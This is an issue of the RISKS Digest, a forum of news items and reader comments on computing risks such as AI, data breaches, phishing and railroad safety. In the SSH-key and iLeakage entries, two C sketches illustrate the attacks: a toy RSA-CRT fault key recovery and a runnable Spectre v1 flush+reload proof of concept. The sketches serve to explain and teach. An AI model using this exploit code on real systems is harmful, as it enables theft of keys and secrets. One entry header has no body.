The RISKS Digest
Volume 33 Issue 94

Saturday, 18th November 2023

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator

Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link in the body of the digest. The shield takes you to a breakdown of Terms of Service for the site; however, only a small number of sites are covered at the moment. The flashlight takes you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…

Contents

How the Railroad Industry Intimidates Employees Into Putting Speed Before Safety
ProPublica
Hikers Rescued After Following Nonexistent Trail on Google Maps
NYTimes
Admission of the state of software
David Lamkin
500 chatbots read the news and discussed it on social media. Guess how that went.
Business Insider
The Problem with Regulating AI
Tim Wu
ChatGPT Created a Fake Dataset With Skewed Results
MedPage Today
Researchers Discover New Vulnerability in Large Language Models
Carnegie Mellon University
Ten ways AI will change democracy
Bruce Schneier
Fake Reviews Are Rampant Online. Can a Crackdown End Them?
NYTimes
OpenAI co-founder & president Greg Brockman quits after firing of CEO Altman
TechCrunch
The AI Pin
Rob Slade
Ukraine's ‘Secret Weapon’ Against Russia Is a U.S. Tech Company
Vera Bergengruen
Cryptographic Keys Protecting SSH Connections Exposed
Dan Goodin
Developers can't seem to stop exposing credentials in publicly accessible code
Ars Technica
Hacking Some More Secure USB Flash Drives—Part II
SySS Tech Blog
Social media gets teens hooked while feeding aggression and impulsivity, and researchers think they know why
CBC
X marks the non-spot?
PGN adapted from Lauren Weinstein
It's Still Easy for Anyone to Become You at Experian
Krebs on Security
Paying ransom for data stolen in cyberattack bankrolls further crime, experts caution
CBC
Toronto Public Library cyber-attack
Mark Brader
People selling cars via Internet get phished
CBC
Data breach of Michigan healthcare giant exposes millions of records
Engadget
More on iLeakage
Victor Miller
Using your iPhone to start your car is about to get a lot easier
The Verge
Massive cryptomining rig discovered under Polish court's floor, stealing power
Ars Technica
A Coder Considers the Waning Days of the Craft
The New Yorker via Steve Bacher
Re: Industrial Robot Crushes Worker to Death
PGN
Re: Toyota has built an EV with a fake transmission
Peter Houppermans
Re: Data on 267,000 Sarnia patients going back 3 decades among cyberattack thefts at 5 Ontario hospitals
Mark Brader
Info on RISKS (comp.risks)

How the Railroad Industry Intimidates Employees Into Putting Speed Before Safety (ProPublica)

Gabe Goldberg <gabe@gabegold.com>
Wed, 15 Nov 2023 23:43:11 -0500

Railroad companies have penalized workers for taking the time to make needed repairs and created a culture in which supervisors threaten and fire the very people hired to keep trains running safely. Regulators say they can’t stop this intimidation.

Bradley Haynes and his colleagues were the last chance Union Pacific had to stop an unsafe train from leaving one of its railyards. Skilled in spotting hidden dangers, the inspectors in Kansas City, Missouri, wrote up so-called “bad orders” to pull defective cars out of assembled trains and send them for repairs.

But on Sept. 18, 2019, the area’s director of maintenance, Andrew Letcher, scolded them for hampering the yard’s ability to move trains on time.

“We're a transportation company, right? We get paid to move freight. We don't get paid to work on cars,” he said.

https://www.propublica.org/article/railroad-safety-union-pacific-csx-bnsf-trains-freight


Hikers Rescued After Following Nonexistent Trail on Google Maps (NYTimes)

Jan Wolitzky <jan.wolitzky@gmail.com>
Sun, 12 Nov 2023 17:04:52 -0500

A Canadian search-and-rescue group said it had conducted two missions recently after hikers may have sought to follow a nonexistent trail on Google Maps.

A search-and-rescue group in British Columbia advised hikers to use a paper map and compass instead of street-mapping apps, after it said two hikers had to be rescued by helicopter, likely having followed a trail that appeared on Google Maps but did not exist.

The group, North Shore Rescue, said on Facebook that on 6 Nov 2023 Google Maps had removed the nonexistent trail, which was in a very steep area with cliffs north of Mount Fromme, which overlooks Vancouver.

https://www.nytimes.com/2023/11/12/world/canada/google-maps-trail-british-columbia.html


Admission of the state of software

David Lamkin <drl@shelford.org>
Thu, 16 Nov 2023 09:51:56 +0000

Having put off buying a ‘smart car’ for as long as possible, I am now the proud (?) owner of a SEAT Arona. The instruction manual is long and detailed, but one statement does not inspire confidence:

> As with most state-of-the-art computer and electronic equipment, in
> certain cases the system may need to be rebooted to make sure that it
> operates correctly.

This statement should shame all software engineers!


500 chatbots read the news and discussed it on social media. Guess how that went. (Business Insider)

Dave Farber <farber@gmail.com>
Thu, 16 Nov 2023 00:29:03 +0900

https://www.businessinsider.com/ai-chatbots-less-toxic-social-networks-twitter-simulation-2023-11


The Problem with Regulating AI (Tim Wu)

Peter Neumann <neumann@csl.sri.com>
Sun, 12 Nov 2023 16:09:15 PST

Tim Wu, The New York Times, 12 Nov 2023

If the government acts prematurely on this evolving technology, it could fail to prevent concrete harm.

Final para: The existence of actual social harm has long been a touchstone of legitimate state action. But that point cuts both ways: The state should proceed cautiously in the absence of harm, but it also has a duty, given evidence of harm, to take action. By that measure, with AI we are at risk of doing too much and too little at the same time.

ChatGPT Created a Fake Dataset With Skewed Results (MedPage Today)

Victor Miller <victorsmiller@gmail.com>
Mon, 13 Nov 2023 20:59:13 +0000

https://www.medpagetoday.com/special-reports/features/107247


Researchers Discover New Vulnerability in Large Language Models (Carnegie Mellon University)

Victor Miller <victorsmiller@gmail.com>
Tue, 14 Nov 2023 16:21:02 +0000

https://www.cmu.edu/news/stories/archives/2023/july/researchers-discover-new-vulnerability-in-large-language-models


Ten ways AI will change democracy

Bruce Schneier <schneier@schneier.com>
Wed, 15 Nov 2023 08:48:25 +0000

[2023.11.13] [https://www.schneier.com/blog/archives/2023/11/ten-ways-ai-will-change-democracy.html] Artificial intelligence will change so many aspects of society, largely in ways that we cannot conceive of yet. Democracy, and the systems of governance that surround it, will be no exception. In this short essay, I want to move beyond the AI-generated disinformation trope and speculate on some of the ways AI will change how democracy functions—in both large and small ways.

When I survey how artificial intelligence might upend different aspects of modern society, democracy included, I look at four different dimensions of change: speed, scale, scope, and sophistication. Look for places where changes in degree result in changes of kind. Those are where the societal upheavals will happen.

Some items on my list are still speculative, but none require science-fictional levels of technological advance. And we can see the first stages of many of them today. When reading about the successes and failures of AI systems, it's important to differentiate between the fundamental limitations of AI as a technology, and the practical limitations of AI systems in the fall of 2023. Advances are happening quickly, and the impossible is becoming the routine. We don't know how long this will continue, but my bet is on continued major technological advances in the coming years. Which means it's going to be a wild ride.

So, here's my list:

  1. AI as educator. We are already seeing AI serving the role of teacher. It's much more effective for a student to learn a topic from an interactive AI chatbot than from a textbook. This has applications for democracy. We can imagine chatbots teaching citizens about different issues, such as climate change or tax policy. We can imagine candidates deploying chatbots [https://www.theatlantic.com/technology/archive/2023/04/ai-generated-political-ads-election-candidate-voter-interaction-transparency/673893/] of themselves, allowing voters to directly engage with them on various issues. A more general chatbot could know the positions of all the candidates, and help voters decide which best represents their position. There are a lot of possibilities here.
  2. AI as sense maker. There are many areas of society where accurate summarization is important. Today, when constituents write to their legislator, those letters get put into two piles—one for and another against—and someone compares the height of those piles. AI can do much better. It can provide a rich summary [https://theconversation.com/ai-could-shore-up-democracy-heres-one-way-207278] of the comments. It can help figure out which are unique and which are form letters. It can highlight unique perspectives. This same system can also work for comments to different government agencies on rulemaking processes—and on documents generated during the discovery process in lawsuits.
  3. AI as moderator, mediator, and consensus builder. Imagine online conversations in which AIs serve the role of moderator. This could ensure that all voices are heard. It could block hateful—or even just off-topic—comments. It could highlight areas of agreement and disagreement. It could help the group reach a decision. This is nothing that a human moderator can't do, but there aren't enough human moderators to go around. AI can give this capability [https://slate.com/technology/2023/04/ai-public-option.html] to every decision-making group. At the extreme, an AI could be an arbiter—a judge—weighing evidence and making a decision. These capabilities don't exist yet, but they are not far off.
  4. AI as lawmaker. We have already seen proposed legislation written [https://lieu.house.gov/media-center/press-releases/rep-lieu-introduces-first-federal-legislation-ever-written-artificial] by AI [https://www.politico.com/newsletters/digital-future-daily/2023/07/19/why-chatgpt-wrote-a-bill-for-itself-00107174], albeit more as a stunt than anything else. But in the future AIs will help craft legislation, dealing with the complex ways laws interact with each other. More importantly, AIs will eventually be able to craft loopholes [https://www.technologyreview.com/2023/03/14/1069717/how-ai-could-write-our-laws/] in legislation, ones potentially too complicated for people to easily notice. On the other side of that, AIs could be used to find loopholes in legislation—for both existing and pending laws. And more generally, AIs could be used to help develop policy positions.
  5. AI as political strategist. Right now, you can ask your favorite chatbot questions about political strategy: what legislation would further your political goals, what positions to publicly take, what campaign slogans to use. The answers you get won't be very good, but that'll improve with time. In the future we should expect politicians to make use of this AI expertise: not to follow blindly, but as another source of ideas. And as AIs become more capable at using tools [https://www.wired.com/story/does-chatgpt-make-you-nervous-try-chatgpt-with-a-hammer/], they can automatically conduct polls and focus groups to test out political ideas. There are a lot of possibilities [https://www.technologyreview.com/2023/07/28/1076756/six-ways-that-ai-could-change-politics/] here: AIs could also engage in fundraising campaigns, directly soliciting contributions from people.
  6. AI as lawyer. We don't yet know which aspects of the legal profession can be done by AIs, but many routine tasks that are now handled by attorneys will soon be able to be completed by an AI. Early attempts at having AIs write legal briefs haven't worked [https://www.reuters.com/legal/new-york-lawyers-sanctioned-using-fake-chatgpt-cases-legal-brief-2023-06-22/], but this will change as the systems get better at accuracy. Additionally, AIs can help people navigate government systems: filling out forms, applying for services, contesting bureaucratic actions. And future AIs will be much better at writing legalese, reducing the cost of legal counsel.
  7. AI as cheap reasoning generator. More generally, AI chatbots are really good at generating persuasive arguments. Today, writing out a persuasive argument takes time and effort, and our systems reflect that. We can easily imagine AIs conducting lobbying campaigns [https://www.nytimes.com/2023/01/15/opinion/ai-chatgpt-lobbying-democracy.html], generating and submitting comments [https://www.belfercenter.org/publication/we-dont-need-reinvent-our-democracy-save-it-ai] on legislation and rulemaking. This also has applications for the legal system. For example: if it is suddenly easy to file thousands of court cases, this will overwhelm the courts. Solutions for this are hard. We could increase the cost of filing a court case, but that becomes a burden on the poor. The only solution might be another AI working for the court, dealing with the deluge of AI-filed cases—which doesn't sound like a great idea.
  8. AI as law enforcer. Automated systems already act as law enforcement in some areas: speed trap cameras are an obvious example. AI can take this kind of thing much further, automatically identifying people who cheat on tax returns or when applying for government services. This has the obvious problem of false positives, which could be hard to contest if the courts believe that the computer is always right. Separately, future laws might be so complicated [https://slate.com/technology/2023/07/artificial-intelligence-microdirectives.html] that only AIs are able to decide whether or not they are being broken. And, like breathalyzers, defendants might not be allowed to know how they work.
  9. AI as propagandist. AIs can produce and distribute propaganda faster than humans can. This is an obvious risk, but we don't know how effective any of it will be. It makes disinformation campaigns easier, which means that more people will take advantage of them. But people will be more inured against the risks. More importantly, AI's ability to summarize and understand text can enable much more effective censorship.
  10. AI as political proxy. Finally, we can imagine an AI voting on behalf of individuals. A voter could feed an AI their social, economic, and political preferences; or it can infer them by listening to them talk and watching their actions. And then it could be empowered to vote on their behalf, either for others who would represent them, or directly on ballot initiatives. On the one hand, this would greatly increase voter participation. On the other hand, it would further disengage people from the act of understanding politics and engaging in democracy.

When I teach AI policy at HKS, I stress the importance of separating the specific AI chatbot technologies in November of 2023 from AI's technological possibilities in general. Some of the items on my list will soon be possible; others will remain fiction for many years. Similarly, our acceptance of these technologies will change. Items on that list that we would never accept today might feel routine in a few years. A judgeless courtroom seems crazy today, but so did a driverless car a few years ago. Don't underestimate our ability to normalize new technologies. My bet is that we're in for a wild ride.

This essay previously appeared on the Harvard Kennedy School Ash Center's website: https://ash.harvard.edu/ten-ways-ai-will-change-democracy


Fake Reviews Are Rampant Online. Can a Crackdown End Them? (NYTimes)

Monty Solomon <monty@roscom.com>
Mon, 13 Nov 2023 17:37:27 -0500

A wave of regulation and industry action has placed the flourishing fake review business on notice. But experts say the problem may be insurmountable.

https://www.nytimes.com/2023/11/13/technology/fake-reviews-crackdown.html


OpenAI co-founder & president Greg Brockman quits after firing of CEO Altman (TechCrunch)

Lauren Weinstein <lauren@vortex.com>
Fri, 17 Nov 2023 16:29:37 -0800

https://techcrunch.com/2023/11/17/greg-brockman-quits-openai-after-abrupt-firing-of-sam-altman/


The AI Pin

Rob Slade <rslade@gmail.com>
Fri, 17 Nov 2023 09:45:44 -0800

The name is obviously intended to capitalize on the recent interest in generative/large language model artificial intelligence. Equally obviously, some AI is involved, as long as you allow your definition of AI to extend to mere speech-to-text capability.

Humane's AI Pin is a smartphone. With no screen. Attaching to your clothing with a magnet, it can make calls, take pictures, access the Internet, and even, at need, project text (presumably it will do images later) onto surfaces using lasers.

In one sense, this is what I always figured that smartphones would become. It is styled as a “smart assistant.” If you have a human assistant, you give them orders verbally, you don't type out commands. (Unless you're sending them texts …)


Ukraine's ‘Secret Weapon’ Against Russia Is a U.S. Tech Company (Vera Bergengruen)

ACM TechNews <technews-editor@acm.org>
Fri, 17 Nov 2023 10:55:40 -0500 (EST)

Vera Bergengruen, Time, 14 Nov 2023

U.S. facial recognition company Clearview AI has become Ukraine's “secret weapon” in its war against Russia. More than 1,500 officials across 18 Ukrainian government agencies are using its technology, which has helped them identify more than 230,000 Russian soldiers and officials who have participated in the Russian invasion. Ukraine also relies on the company to assist with other tasks, including processing citizens who lost their identification and locating abducted Ukrainian children. Ukraine has run at least 350,000 searches of Clearview's database in the 20 months since the outbreak of the war. Said Clearview AI CEO Hoan Ton-That, “Using facial recognition in war zones is something that's going to save lives.”


Cryptographic Keys Protecting SSH Connections Exposed (Dan Goodin)

ACM TechNews <technews-editor@acm.org>
Wed, 15 Nov 2023 11:57:51 -0500 (EST)

Dan Goodin, Ars Technica, 13 Nov 2023, via ACM Tech News

Researchers at the University of California, San Diego (UCSD) demonstrated that a large portion of cryptographic keys used to protect data in computer-to-server SSH traffic is vulnerable, and were able to calculate the private portion of almost 200 unique SSH keys they observed in public Internet scans. The vulnerability occurs when there are errors during the signature generation that takes place when a client and server are establishing a connection. It affects only keys using the RSA cryptographic algorithm, which the researchers found in roughly a third of the SSH signatures they examined, translating to about 1 billion signatures, about one in a million of which exposed the private key of the host. Said UCSD's Keegan Ryan, “Our research reiterates the importance of defense in depth in cryptographic implementations and illustrates the need for protocol designs that are more robust against computational errors.”
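
The failure mode is a descendant of the classic RSA-CRT fault attack: a signer using the Chinese Remainder Theorem computes the signature separately mod p and mod q, and if a hardware error corrupts either half, the result is a signature that is correct modulo one prime but not the other. Anyone who sees such a signature can factor the modulus with a single gcd. The toy C sketch below is a hypothetical illustration with 20-bit primes, not the UCSD code (the researchers' passive attack uses lattices to cope with real-world hashing and padding, but the core leak is the same):

  /* Hypothetical toy demo of the RSA-CRT fault attack (not the UCSD code).
     Requires GCC or Clang for unsigned __int128.
     Build: cc -O2 rsa_fault_sketch.c && ./a.out */
  #include <stdio.h>
  #include <stdint.h>

  typedef unsigned __int128 u128;

  static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m) {
      return (uint64_t)((u128)a * b % m);
  }
  static uint64_t powmod(uint64_t b, uint64_t e, uint64_t m) {
      uint64_t r = 1;
      for (b %= m; e; e >>= 1) {
          if (e & 1) r = mulmod(r, b, m);
          b = mulmod(b, b, m);
      }
      return r;
  }
  static uint64_t gcd64(uint64_t a, uint64_t b) {
      while (b) { uint64_t t = a % b; a = b; b = t; }
      return a;
  }
  static uint64_t invmod(uint64_t a, uint64_t m) {   /* extended Euclid */
      int64_t t = 0, nt = 1;
      uint64_t r = m, nr = a % m;
      while (nr) {
          uint64_t q = r / nr;
          int64_t  x = t - (int64_t)q * nt; t = nt; nt = x;
          uint64_t y = r - q * nr;          r = nr; nr = y;
      }
      return (uint64_t)(t < 0 ? t + (int64_t)m : t);
  }

  int main(void) {
      /* Toy 20-bit primes; real SSH host keys use far larger ones. */
      const uint64_t p = 1000003, q = 1000033, e = 65537;
      const uint64_t N = p * q, phi = (p - 1) * (q - 1);
      const uint64_t d = invmod(e, phi);
      const uint64_t m = 123456789 % N;     /* message representative */

      /* CRT signing: one half mod p, one half mod q, then recombine. */
      uint64_t sp = powmod(m, d % (p - 1), p);
      uint64_t sq = powmod(m, d % (q - 1), q);
      sq ^= 1;                              /* the fault: one flipped bit */
      uint64_t h   = mulmod(invmod(q, p), (sp + p - sq % p) % p, p);
      uint64_t sig = sq + h * q;            /* faulty signature */

      /* Anyone seeing (N, e, m, sig) can now factor the modulus:
         sig^e == m (mod p) still holds, but not mod q. */
      uint64_t delta = (powmod(sig, e, N) + N - m) % N;
      printf("gcd(sig^e - m, N) = %llu  (p = %llu)\n",
             (unsigned long long)gcd64(delta, N), (unsigned long long)p);
      return 0;
  }

The standard countermeasure is for the signer to verify its own signature before releasing it, so that a faulted signature never leaves the host.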


Developers can't seem to stop exposing credentials in publicly accessible code (Ars Technica)

Victor Miller <victorsmiller@gmail.com>
Thu, 16 Nov 2023 14:15:59 +0000

https://arstechnica.com/security/2023/11/developers-cant-seem-to-stop-exposing-credentials-in-publicly-accessible-code/


Hacking Some More Secure USB Flash Drives—Part II (SySS Tech Blog)

Victor Miller <victorsmiller@gmail.com>
Mon, 13 Nov 2023 02:06:07 +0000

https://blog.syss.com/posts/hacking-usb-flash-drives-part-2/


Social media gets teens hooked while feeding aggression and impulsivity, and researchers think they know why (CBC)

Matthew Kruk <mkrukg@gmail.com>
Thu, 16 Nov 2023 05:49:16 -0700

https://www.cbc.ca/news/health/smartphone-brain-nov14-1.7029406

Kids who spend hours on their phones scrolling through social media are showing more aggression, depression and anxiety, say Canadian researchers.

Emma Duerden holds the Canada Research Chair in neuroscience and learning disorders at Western University, where she uses brain imaging to study the impact of social media use on children's brains.

She and others found that screen time has fallen just slightly from the record 13 hours a day some Canadian parents reported for six- to 12-year-olds in the early months of the COVID-19 pandemic.

“We're seeing lots of these effects. Children are reporting high levels of depression and anxiety or aggression. It really is a thing.”


X marks the non-spot? (PGN adapted)

Lauren Weinstein <lauren@vortex.com>
Fri, 17 Nov 2023 16:37:46 -0800

It's Still Easy for Anyone to Become You at Experian (Krebs on Security)

Steve Bacher <sebmb1@verizon.net>
Tue, 14 Nov 2023 14:47:20 +0000 (UTC)

https://krebsonsecurity.com/2023/11/its-still-easy-for-anyone-to-become-you-at-experian/


Paying ransom for data stolen in cyberattack bankrolls further crime, experts caution (CBC)

Matthew Kruk <mkrukg@gmail.com>
Sat, 18 Nov 2023 13:37:55 -0700

https://www.cbc.ca/radio/spark/cyberattacks-ransomware-paying-ransom-crime-1.7030579

When the town of St. Marys, Ont., fell victim to a cyberattack last year, lawyers advised the municipality to pay a ransom of $290,000 in cryptocurrency.

The decision was made after an analysis by firms specializing in cybersecurity. Al Strathdee, mayor of the southwestern Ontario town of about 7,000 residents, said the potential risk to people's data was too high not to pay up.


Toronto Public Library cyber-attack

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 01:53:56 -0500 (EST)

[Note: This was previously reported as ransomware. Now they just say that no ransom has been paid.]

The Toronto Public Library reported a cyber-attack on October 28, and later said that “a large number of files” were stolen, including personal information of library staff. While they're working on the problem, the library's web site is down. (You get forwarded to an information page currently at: https://torontopubliclibrary.typepad.com/tpl_maintenance/toronto-public-library-website-maintenance.html)

The public computers and printers at all 100 library branches are also down. All this means that you (meaning me) can't request a book be held for you, and you also can't search the electronic catalog that replaced the old card catalogs.

See also: http://www.cbc.ca/news/any-1.7028982


People selling cars via Internet get phished (CBC)

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 02:00:47 -0500 (EST)

It says here (http://www.cbc.ca/news/any-1.7028730) that people who post car-for-sale ads are being targeted by scammers. The seller gets what appears to be an offer, but it requests the seller use a specific source to provide the vehicle's history: a source that's actually phishing for credit-card information.


Data breach of Michigan healthcare giant exposes millions of records (Engadget)

Monty Solomon <monty@roscom.com>
Tue, 14 Nov 2023 22:27:15 -0500

https://www.engadget.com/data-breach-of-michigan-healthcare-giant-exposes-millions-of-records-153450209.html


More on iLeakage

Victor Miller <victorsmiller@gmail.com>
Thu, 16 Nov 2023 19:26:39 -0800

[…] We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution. In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.

Virtually all modern CPUs use a performance optimization where they predict if a branch instruction will be taken or not, should the outcome not be readily available. Once a prediction is made, the CPU will execute instructions along the prediction, a process called speculative execution. If the CPU realizes it had mispredicted, it must revert all changes in the state it performed after the prediction. Both desktop and mobile CPUs exhibit this behavior, regardless of manufacturer (such as Apple, AMD, or Intel).

A Spectre attack coerces the CPU into speculatively executing the wrong flow of instructions. If this wrong flow has instructions depending on sensitive data, their value can be inferred through a side channel even after the CPU realizes the mistake and reverts its changes.
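
To make that concrete, the textbook Spectre v1 “bounds check bypass” gadget fits in a few lines of C. The sketch below is a hypothetical, self-contained x86-64 illustration of the generic CPU-level pattern, not the iLeakage attack itself (which reaches a similar gadget from unprivileged JavaScript inside Safari on Apple CPUs); the iteration counts and the 80-cycle timing threshold are assumptions, and mitigated or differently tuned processors may show no signal at all:

  /* Hypothetical Spectre-v1 sketch: bounds-check bypass + flush&reload.
     Not the iLeakage code. x86-64, GCC/Clang only.
     Build: cc -O1 spectre_sketch.c && ./a.out */
  #include <stdio.h>
  #include <stdint.h>
  #include <x86intrin.h>

  #define STRIDE 4096                    /* one probe slot per page */

  unsigned array1_size = 16;
  uint8_t  array1[16];
  uint8_t  array2[256 * STRIDE];
  const char *secret = "R";              /* never read architecturally */
  volatile uint8_t sink;                 /* defeats dead-load elimination */

  /* Victim: the bounds check always holds architecturally, but a trained
     predictor lets the CPU speculatively read array1[x] out of bounds;
     the dependent load leaves one array2 cache line warm. */
  void victim(size_t x) {
      if (x < array1_size)
          sink = array2[array1[x] * STRIDE];
  }

  int main(void) {
      size_t evil = (size_t)(secret - (char *)array1); /* OOB offset */
      int hits[256] = {0};

      for (int round = 0; round < 1000; round++) {
          for (int i = 0; i < 256; i++)         /* flush the probe array */
              _mm_clflush(&array2[i * STRIDE]);
          for (int j = 0; j < 40; j++)          /* train: always in bounds */
              victim(j % array1_size);
          _mm_clflush(&array1_size);            /* bounds check resolves late */
          _mm_mfence();
          victim(evil);                         /* misprediction leaks */

          for (int k = 0; k < 256; k++) {       /* reload and time each slot */
              int i = (k * 167 + 13) & 255;     /* defeat the prefetcher */
              unsigned aux;
              uint64_t t0 = __rdtscp(&aux);
              sink = array2[i * STRIDE];
              if (__rdtscp(&aux) - t0 < 80)     /* 80 cycles: an assumption */
                  hits[i]++;
          }
      }
      int best = 1;                             /* slot 0 is training noise */
      for (int i = 2; i < 256; i++)
          if (hits[i] > hits[best]) best = i;
      printf("hottest probe slot: %d ('%c')\n", best, best);
      return 0;
  }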

We disclosed our results to Apple on September 12, 2022 (408 days before public release).


Using your iPhone to start your car is about to get a lot easier (The Verge)

Monty Solomon <monty@roscom.com>
Thu, 16 Nov 2023 21:12:33 -0500

https://www.theverge.com/2023/11/16/23964379/apple-iphone-digital-key-uwb-ccc-fira-working-group


Massive cryptomining rig discovered under Polish court's floor, stealing power (Ars Technica)

Monty Solomon <monty@roscom.com>
Thu, 16 Nov 2023 22:41:25 -0500

https://arstechnica.com/?p=1984512


A Coder Considers the Waning Days of the Craft (The New Yorker)

Steve Bacher <sebmb1@verizon.net>
Fri, 17 Nov 2023 10:33:36 -0800

James Somers, a professional coder, writes about the astonishing scripting skills of A.I. chatbots like GPT-4 and considers the future of a once exalted craft.

https://www.newyorker.com/magazine/2023/11/20/a-coder-considers-the-waning-days-of-the-craft

I really disagree with some of what the writer says about programming/coding.

“What I learned was that programming is not really about knowledge or skill but simply about patience, or maybe obsession.”

Almost certainly he got that attitude because he started, from no experience, with the worst possible programming language, Visual C++. There's no way anyone should begin learning how to code with any C++ variant. Those of us who started with Basic (or even FORTRAN, in my case) ended up doing better. Not to mention Logo.


Re: Industrial Robot Crushes Worker to Death (RISKS-33.93)

Peter Neumann <neumann@csl.sri.com>
Mon, 13 Nov 2023 10:13:49 PST

CBS News, 09 Nov 2023

An industrial robot crushed a worker to death at a vegetable packaging factory in South Korea's southern county of Goseong. According to police, the victim was grabbed and pressed against a conveyor belt by the machine's robotic arms. The machine was equipped with sensors designed to identify boxes. “It wasn't an advanced, artificial intelligence-powered robot, but a machine that simply picks up boxes and puts them on pallets,” said Kang Jin-gi at Goseong Police Station. According to another police official, security camera footage showed the man had moved near the robot with a box in his hands, which could have triggered the machine's reaction. Similar incidents have happened in South Korea before.


Re: Toyota has built an EV with a fake transmission (RISKS-33.93)

Peter Houppermans <peter@houppermans.net>
Tue, 14 Nov 2023 21:34:36 +0100

It depends on your perspective—there is actually a good use case for it.

You may argue that this will eventually be a thing of the past, but changing gear manually is still very prevalent in Europe. I would posit that this has something to do with the difference in fuel prices, as manual cars are (or used to be) more economical to drive. A side effect is a restriction on driving licenses: if you learned to drive in an automatic, you are not allowed to drive a manual car, in some countries for a few years; in some, you even have to pass a separate exam.

Learning to drive in a manual car qualifies you for both, and this presently creates a conundrum for driving schools: to teach someone to drive a manual car, they have effectively been legally required to use an ICE vehicle, as EVs tend to be automatics. Until now.

If Toyota's “fake transmission” mimics ICE behaviour realistically enough to be ratified as a viable alternative, it could offer an EV stopgap until manual vehicles become rare enough for the demand to disappear.

[From that perspective, it's not a game or gadget, but a useful simulator.]
[Martin Ward responds:
That's an ingenious example that I hadn't thought of! It would make for a pretty expensive learner car. MW]

Re: Data on 267,000 Sarnia patients going back 3 decades among cyberattack thefts at 5 Ontario hospitals (RISKS-33.93)

Mark Brader <msb@Vex.Net>
Sat, 18 Nov 2023 01:38:59 -0500 (EST)

New update: https://www.cbc.ca/news/canada/windsor/anykey-1.7031544
